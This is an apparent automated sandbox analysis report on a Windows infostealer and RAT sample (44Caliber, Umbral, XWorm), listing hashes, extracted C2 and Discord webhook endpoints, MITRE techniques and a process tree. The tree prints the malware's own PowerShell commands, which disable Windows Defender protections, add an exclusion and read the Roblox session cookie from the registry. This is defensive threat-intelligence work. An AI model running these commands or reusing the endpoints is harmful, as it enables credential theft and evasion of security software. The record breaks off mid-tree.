44caliber | 366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-09-2024 01:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe
Size

898KB
MD5

ccfa4401df6dcaef4265f5edd06f3fde
SHA1

f96f403087bb1ad5483bc68a5a3db8a1ca833f4e
SHA256

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4
SHA512

02d1efcaaf84cd39c585359edc613daac7d6006adcd714b027d2f9ac5fe8184cb5cc7bb61762cd766d4f409149635d422d8a4b318970c6666e7caf2c16d208ac
SSDEEP

24576:9tZhUkDINlUj3HMcggFUnCwCjsiD5udn3:9tZySIUj3HDgyUCrjsi

Score

10^/10

44caliber umbral xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

stage-von.gl.at.ply.gg:19496

Attributes

Install_directory
%AppData%
install_file
USB.exe

Extracted

Family

44caliber

https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9

Extracted

Family

umbral

https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0007000000015f1b-45.dat	family_umbral
behavioral1/memory/1716-47-0x0000000000F60000-0x0000000000FA0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0009000000015d5c-9.dat	family_xworm
behavioral1/memory/1268-14-0x0000000000C40000-0x0000000000C78000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2996	powershell.exe
344	powershell.exe
2580	powershell.exe
2816	powershell.exe
3432	powershell.exe
3000	powershell.exe
1136	powershell.exe
2916	powershell.exe
2204	powershell.exe
1492	powershell.exe
2564	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

Umbral.exeUmbral.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Drops startup file 2 IoCs

Processes:

Microsoft Edge.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk	Microsoft Edge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk	Microsoft Edge.exe

Executes dropped EXE 64 IoCs

Processes:

Nursultan.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeInsidious.exeUmbral.exeMicrosoft Edge.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeInsidious.exeUmbral.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeMicrosoft Edge.exeInsidious.exeNursultan2.exeUmbral.exeNursultan.exeMicrosoft Edge.exeInsidious.exeUmbral.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeInsidious.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeUmbral.exe

pid	Process
2416	Nursultan.exe
1268	Microsoft Edge.exe
2732	Nursultan2.exe
2836	Nursultan.exe
2668	Nursultan2.exe
2724	Nursultan.exe
1440	Insidious.exe
1900	Microsoft Edge.exe
1716	Umbral.exe
2216	Nursultan2.exe
872	Nursultan.exe
1112	Insidious.exe
2644	Microsoft Edge.exe
324	Umbral.exe
1608	Nursultan2.exe
2440	Nursultan.exe
2280	Insidious.exe
1844	Microsoft Edge.exe
1324	Umbral.exe
2120	Nursultan2.exe
2452	Nursultan.exe
2416	Insidious.exe
992	Microsoft Edge.exe
1136	Umbral.exe
696	Insidious.exe
1048	Umbral.exe
2360	Microsoft Edge.exe
2324	Nursultan.exe
1580	Nursultan2.exe
2588	Nursultan.exe
612	Nursultan2.exe
712	Insidious.exe
984	Umbral.exe
3036	Microsoft Edge.exe
2880	Nursultan2.exe
1812	Nursultan.exe
2100	Insidious.exe
576	Microsoft Edge.exe
1864	Umbral.exe
2976	Microsoft Edge.exe
1972	Insidious.exe
3068	Nursultan2.exe
1144	Umbral.exe
1108	Nursultan.exe
872	Microsoft Edge.exe
2696	Insidious.exe
2156	Umbral.exe
2836	Nursultan2.exe
2936	Nursultan.exe
2356	Nursultan2.exe
1348	Nursultan.exe
1052	Insidious.exe
408	Microsoft Edge.exe
2816	Umbral.exe
2136	Nursultan2.exe
764	Nursultan.exe
1584	Insidious.exe
880	Microsoft Edge.exe
2820	Umbral.exe
1684	Insidious.exe
1108	Microsoft Edge.exe
2624	Nursultan2.exe
3032	Nursultan.exe
992	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Microsoft Edge.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Edge"	Microsoft Edge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
6	ip-api.com
52	ip-api.com
55	freegeoip.app
8	freegeoip.app
12	freegeoip.app
36	freegeoip.app
48	freegeoip.app
17	freegeoip.app
18	freegeoip.app
43	freegeoip.app
27	freegeoip.app
33	freegeoip.app
40	freegeoip.app

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXE

pid	Process
3384	cmd.exe
2928	PING.EXE

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Insidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
2636	timeout.exe
1608	timeout.exe
3172	timeout.exe
3776	timeout.exe
3504	timeout.exe
2816	timeout.exe
892	timeout.exe
3992	timeout.exe
928	timeout.exe
2808	timeout.exe
2456	timeout.exe
1636	timeout.exe
1652	timeout.exe
2104	timeout.exe
3980	timeout.exe
2576	timeout.exe
324	timeout.exe
2196	timeout.exe
2656	timeout.exe
1848	timeout.exe
3612	timeout.exe
2952	timeout.exe
1636	timeout.exe
2876	timeout.exe
3536	timeout.exe
540	timeout.exe
2028	timeout.exe
3020	timeout.exe
3432	timeout.exe
444	timeout.exe
1040	timeout.exe
2392	timeout.exe
2372	timeout.exe
872	timeout.exe
892	timeout.exe
1756	timeout.exe
1540	timeout.exe
1388	timeout.exe
2828	timeout.exe
1636	timeout.exe
332	timeout.exe
2624	timeout.exe
1060	timeout.exe
640	timeout.exe
2832	timeout.exe
376	timeout.exe
1740	timeout.exe
3596	timeout.exe
2704	timeout.exe
2344	timeout.exe
2188	timeout.exe
884	timeout.exe
3384	timeout.exe
4044	timeout.exe
1500	timeout.exe
1724	timeout.exe
4028	timeout.exe
3988	timeout.exe
3128	timeout.exe
2688	timeout.exe
1848	timeout.exe
3684	timeout.exe
2676	timeout.exe
2532	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exe

pid	Process
1088	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
2928	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
2804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Insidious.exeInsidious.exeInsidious.exeInsidious.exeUmbral.exepowershell.exepowershell.exeInsidious.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInsidious.exeMicrosoft Edge.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exepowershell.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exe

pid	Process
1440	Insidious.exe
1440	Insidious.exe
1440	Insidious.exe
1112	Insidious.exe
1112	Insidious.exe
2280	Insidious.exe
2280	Insidious.exe
2416	Insidious.exe
2416	Insidious.exe
1716	Umbral.exe
3000	powershell.exe
2996	powershell.exe
1440	Insidious.exe
696	Insidious.exe
696	Insidious.exe
344	powershell.exe
1160	powershell.exe
1136	powershell.exe
2916	powershell.exe
2204	powershell.exe
1492	powershell.exe
712	Insidious.exe
712	Insidious.exe
712	Insidious.exe
1268	Microsoft Edge.exe
2100	Insidious.exe
2100	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
712	Insidious.exe
2696	Insidious.exe
2696	Insidious.exe
1052	Insidious.exe
1052	Insidious.exe
1052	Insidious.exe
1584	Insidious.exe
1584	Insidious.exe
1684	Insidious.exe
1684	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
2580	powershell.exe
2344	Insidious.exe
2344	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
2660	Insidious.exe
2660	Insidious.exe
1304	Insidious.exe
1304	Insidious.exe
3020	Insidious.exe
3020	Insidious.exe
1820	Insidious.exe
1820	Insidious.exe
1808	Insidious.exe
1808	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
1724	Insidious.exe
1724	Insidious.exe
448	Insidious.exe
448	Insidious.exe
1132	Insidious.exe
1132	Insidious.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Microsoft Edge.exeMicrosoft Edge.exeInsidious.exeUmbral.exeInsidious.exeMicrosoft Edge.exewmic.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exepowershell.exepowershell.exeInsidious.exepowershell.exeMicrosoft Edge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInsidious.exeMicrosoft Edge.exeInsidious.exe

description	pid	Process
Token: SeDebugPrivilege	1268	Microsoft Edge.exe
Token: SeDebugPrivilege	1900	Microsoft Edge.exe
Token: SeDebugPrivilege	1440	Insidious.exe
Token: SeDebugPrivilege	1716	Umbral.exe
Token: SeDebugPrivilege	1112	Insidious.exe
Token: SeDebugPrivilege	2644	Microsoft Edge.exe
Token: SeIncreaseQuotaPrivilege	576	wmic.exe
Token: SeSecurityPrivilege	576	wmic.exe
Token: SeTakeOwnershipPrivilege	576	wmic.exe
Token: SeLoadDriverPrivilege	576	wmic.exe
Token: SeSystemProfilePrivilege	576	wmic.exe
Token: SeSystemtimePrivilege	576	wmic.exe
Token: SeProfSingleProcessPrivilege	576	wmic.exe
Token: SeIncBasePriorityPrivilege	576	wmic.exe
Token: SeCreatePagefilePrivilege	576	wmic.exe
Token: SeBackupPrivilege	576	wmic.exe
Token: SeRestorePrivilege	576	wmic.exe
Token: SeShutdownPrivilege	576	wmic.exe
Token: SeDebugPrivilege	576	wmic.exe
Token: SeSystemEnvironmentPrivilege	576	wmic.exe
Token: SeRemoteShutdownPrivilege	576	wmic.exe
Token: SeUndockPrivilege	576	wmic.exe
Token: SeManageVolumePrivilege	576	wmic.exe
Token: 33	576	wmic.exe
Token: 34	576	wmic.exe
Token: 35	576	wmic.exe
Token: SeIncreaseQuotaPrivilege	576	wmic.exe
Token: SeSecurityPrivilege	576	wmic.exe
Token: SeTakeOwnershipPrivilege	576	wmic.exe
Token: SeLoadDriverPrivilege	576	wmic.exe
Token: SeSystemProfilePrivilege	576	wmic.exe
Token: SeSystemtimePrivilege	576	wmic.exe
Token: SeProfSingleProcessPrivilege	576	wmic.exe
Token: SeIncBasePriorityPrivilege	576	wmic.exe
Token: SeCreatePagefilePrivilege	576	wmic.exe
Token: SeBackupPrivilege	576	wmic.exe
Token: SeRestorePrivilege	576	wmic.exe
Token: SeShutdownPrivilege	576	wmic.exe
Token: SeDebugPrivilege	576	wmic.exe
Token: SeSystemEnvironmentPrivilege	576	wmic.exe
Token: SeRemoteShutdownPrivilege	576	wmic.exe
Token: SeUndockPrivilege	576	wmic.exe
Token: SeManageVolumePrivilege	576	wmic.exe
Token: 33	576	wmic.exe
Token: 34	576	wmic.exe
Token: 35	576	wmic.exe
Token: SeDebugPrivilege	2280	Insidious.exe
Token: SeDebugPrivilege	1844	Microsoft Edge.exe
Token: SeDebugPrivilege	2416	Insidious.exe
Token: SeDebugPrivilege	992	Microsoft Edge.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	696	Insidious.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	2360	Microsoft Edge.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	712	Insidious.exe
Token: SeDebugPrivilege	3036	Microsoft Edge.exe
Token: SeDebugPrivilege	1268	Microsoft Edge.exe
Token: SeDebugPrivilege	2100	Insidious.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Microsoft Edge.exe

pid	Process
1268	Microsoft Edge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exeNursultan.exeNursultan.exeNursultan2.execmd.execmd.exeNursultan.exeNursultan2.execmd.execmd.exe

description	pid	Process	procid_target
PID 2120 wrote to memory of 2416	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	30
PID 2120 wrote to memory of 2416	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	30
PID 2120 wrote to memory of 2416	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	30
PID 2120 wrote to memory of 1268	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	31
PID 2120 wrote to memory of 1268	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	31
PID 2120 wrote to memory of 1268	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	31
PID 2416 wrote to memory of 2732	2416	Nursultan.exe	32
PID 2416 wrote to memory of 2732	2416	Nursultan.exe	32
PID 2416 wrote to memory of 2732	2416	Nursultan.exe	32
PID 2416 wrote to memory of 2836	2416	Nursultan.exe	33
PID 2416 wrote to memory of 2836	2416	Nursultan.exe	33
PID 2416 wrote to memory of 2836	2416	Nursultan.exe	33
PID 2836 wrote to memory of 2668	2836	Nursultan.exe	36
PID 2836 wrote to memory of 2668	2836	Nursultan.exe	36
PID 2836 wrote to memory of 2668	2836	Nursultan.exe	36
PID 2836 wrote to memory of 2724	2836	Nursultan.exe	37
PID 2836 wrote to memory of 2724	2836	Nursultan.exe	37
PID 2836 wrote to memory of 2724	2836	Nursultan.exe	37
PID 2732 wrote to memory of 340	2732	Nursultan2.exe	38
PID 2732 wrote to memory of 340	2732	Nursultan2.exe	38
PID 2732 wrote to memory of 340	2732	Nursultan2.exe	38
PID 2732 wrote to memory of 1440	2732	Nursultan2.exe	40
PID 2732 wrote to memory of 1440	2732	Nursultan2.exe	40
PID 2732 wrote to memory of 1440	2732	Nursultan2.exe	40
PID 2732 wrote to memory of 1900	2732	Nursultan2.exe	41
PID 2732 wrote to memory of 1900	2732	Nursultan2.exe	41
PID 2732 wrote to memory of 1900	2732	Nursultan2.exe	41
PID 2732 wrote to memory of 1716	2732	Nursultan2.exe	42
PID 2732 wrote to memory of 1716	2732	Nursultan2.exe	42
PID 2732 wrote to memory of 1716	2732	Nursultan2.exe	42
PID 340 wrote to memory of 1388	340	cmd.exe	43
PID 340 wrote to memory of 1388	340	cmd.exe	43
PID 340 wrote to memory of 1388	340	cmd.exe	43
PID 1388 wrote to memory of 1788	1388	cmd.exe	44
PID 1388 wrote to memory of 1788	1388	cmd.exe	44
PID 1388 wrote to memory of 1788	1388	cmd.exe	44
PID 1388 wrote to memory of 2844	1388	cmd.exe	45
PID 1388 wrote to memory of 2844	1388	cmd.exe	45
PID 1388 wrote to memory of 2844	1388	cmd.exe	45
PID 340 wrote to memory of 2952	340	cmd.exe	46
PID 340 wrote to memory of 2952	340	cmd.exe	46
PID 340 wrote to memory of 2952	340	cmd.exe	46
PID 340 wrote to memory of 2576	340	cmd.exe	47
PID 340 wrote to memory of 2576	340	cmd.exe	47
PID 340 wrote to memory of 2576	340	cmd.exe	47
PID 2724 wrote to memory of 2216	2724	Nursultan.exe	48
PID 2724 wrote to memory of 2216	2724	Nursultan.exe	48
PID 2724 wrote to memory of 2216	2724	Nursultan.exe	48
PID 2724 wrote to memory of 872	2724	Nursultan.exe	49
PID 2724 wrote to memory of 872	2724	Nursultan.exe	49
PID 2724 wrote to memory of 872	2724	Nursultan.exe	49
PID 2668 wrote to memory of 1472	2668	Nursultan2.exe	50
PID 2668 wrote to memory of 1472	2668	Nursultan2.exe	50
PID 2668 wrote to memory of 1472	2668	Nursultan2.exe	50
PID 1472 wrote to memory of 1364	1472	cmd.exe	52
PID 1472 wrote to memory of 1364	1472	cmd.exe	52
PID 1472 wrote to memory of 1364	1472	cmd.exe	52
PID 1364 wrote to memory of 1600	1364	cmd.exe	53
PID 1364 wrote to memory of 1600	1364	cmd.exe	53
PID 1364 wrote to memory of 1600	1364	cmd.exe	53
PID 1364 wrote to memory of 1108	1364	cmd.exe	54
PID 1364 wrote to memory of 1108	1364	cmd.exe	54
PID 1364 wrote to memory of 1108	1364	cmd.exe	54
PID 2668 wrote to memory of 1112	2668	Nursultan2.exe	55

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
2844	attrib.exe
3808	attrib.exe

C:\Users\Admin\AppData\Local\Temp\366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe
"C:\Users\Admin\AppData\Local\Temp\366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2732
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:340
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1388
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        6⤵
        
        PID:1788
      - C:\Windows\system32\cmd.exe
        
        cmd
        6⤵
        
        PID:2844
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2952
    - - C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:2576
    - - C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        5⤵
        
        PID:2308
  - - C:\Users\Admin\AppData\Local\Temp\Insidious.exe
      "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
      "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1716
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:576
    - - C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:1908
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:1904
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:2896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2580
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1088
    - - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3384
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2928
- - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2668
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1472
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        7⤵
        
        PID:1600
        
        C:\Windows\system32\cmd.exe
        
        cmd
        7⤵
        
        PID:1108
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:612
      - C:\Windows\system32\timeout.exe
